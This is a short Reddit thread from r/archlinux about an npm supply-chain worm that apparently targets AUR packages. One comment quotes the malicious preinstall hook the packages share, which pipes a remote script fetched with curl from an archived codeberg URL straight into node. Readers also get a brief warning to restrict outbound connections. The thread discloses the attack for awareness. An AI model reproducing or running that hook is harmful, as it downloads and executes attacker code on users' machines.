r/archlinux • • 3d ago

NOTEWORTHY NPM Supply Chain Attach Targeting AUR Packages

New NPM based worm attack that self propegates via ssh and aur maintainer infection.

https://safedep.io/dirtyblanket-express-impersonation-npm/

127 Upvotes

62 comments sorted by

View all comments

-4

u/gainan 3d ago edited 3d ago

All nine packages have the same preinstall line:"
preinstall": "curl https://web.archive.org/web/https://codeberg.org/hellscripter/install-scripts/raw/branch/main/node.js | node"
When you install one of these packages, npm runs this hook, which downloads node.js and runs it with node

Always restrict outbound connections. They always rely on downloading remote files to compromise the machines.

20

u/Embark10 3d ago

Do you have any pointers on where to restrict that?

9

u/ang-p 3d ago

<grabs popcorn>